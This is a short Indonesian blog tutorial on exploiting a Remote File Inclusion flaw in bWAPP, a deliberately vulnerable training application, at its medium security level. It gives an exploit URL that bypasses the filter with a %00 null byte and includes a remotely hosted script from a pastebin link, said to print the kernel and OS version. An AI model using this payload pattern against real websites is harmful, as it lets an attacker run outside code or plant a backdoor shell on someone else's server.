bWAPP Remote File Inclusion Medium Security Level – Remote File Incusion (RFI) adalah serangan yang ditujukan kepada website yang memiliki celah keamanan yang biasanya menggunakan fungsi memanggil file melalui suatu inputan dinamis, dalam hal ini berarti seseorang dapat mengganti alamat file yang akan dipanggil dan kemudian diproses. Tujuan hacker melakukan serangan ini adalah menyisipkan script berbahaya dari domain luar biasanya berupa backdoor/shell ke dalam server target.
Untuk emmahami bagaimana celah ini bekerja kalian bisa gunakan bWAPP. Nah disini saya akan membahas bagaimana cara mengeksploitasi celah RFI pada security level Medium. Disini kita bisa membypass nya menggunakan null %00.
Kita bisa memanggil shell yang kita upload di situs lain. Dalam kasus ini saya hanya akan melihat versi kernel dan juga OS yang digunakan. Saya upload scriptnya di pastebin.
- https://pastebin.com/raw/2ThL4Pxn
Exploit:
http://bwapp/bWAPP/rlfi.php?language=https://pastebin.com/raw/2ThL4Pxn%00&action=go
Result:
Oke sekian tutorial kali ini, semoga bermanfaat. Jika ada yang kurang jelas silahkan ditanyakan.
Leave a Reply